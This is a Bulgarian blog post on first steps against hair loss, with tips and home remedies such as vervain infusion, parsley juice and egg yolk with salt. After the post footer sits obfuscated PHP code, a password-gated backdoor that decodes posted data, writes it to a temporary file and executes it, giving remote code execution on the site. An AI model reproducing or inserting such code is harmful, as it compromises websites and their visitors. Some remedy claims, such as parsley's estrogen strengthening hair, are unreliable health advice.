Първи стъпки срещу косопад | Косопад

Първи стъпки срещу косопад

Живота на косата продължава между 2 и 6 години. После пада и отстъпва място на друга. Не е нормално дневно да губите 100 косъма, а да няма нови, които да ги заместват. Когато това се случва, се обяснява с изтощаване или дефицит на вещества. Но това не е съвсем вярно. Има хора, които въпреки че редовно се преуморяват, имат гъста коса и такива, които са здрави, а косата им капе.

kosopad-navici

Има още много други причини, които да предизвикат косопад – инфекциозно заболяване, изтощение, стрес, и пр.

Във всеки случай – не се отчайвайте. Ако имате редовно косопад, трябва да се заемете с него. Ето няколко съвета, с които да започнете:

– Подстригвайте се, колкото е възможно по- редовно. Така ще е по- лесно, когато се решете и когато използвате mujki-kosopadпродукти за коса.
– Ако косопадът е много обилен, премахнете всякаква употреба на химически продукти за коса за известно време.
– Печете се на слънце 10 – 15 минути. Разтваряйте косата си, така че слънцето да стига до скалпа.

Освен тези съвети, може да използвате и редица природни средства:

Върбинка. Направете запарка с листа и нанесете. Не само че помага при косопад, но прави косата много блестяща.

Магданоз. Тъй като съдържа естроген, прави косата здрави и помага при косопад. Направете сок и правете масажи два пъти дневно.

Жълтък. Разбийте един – два жълтъка и сложете 1 с.л. сол. Чрез малка четка нанасяйте от корена до върха. Оставете да престои половин час. Отмийте първо с хладка вода, а после със студена.

12. май 2014 19:41:41 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}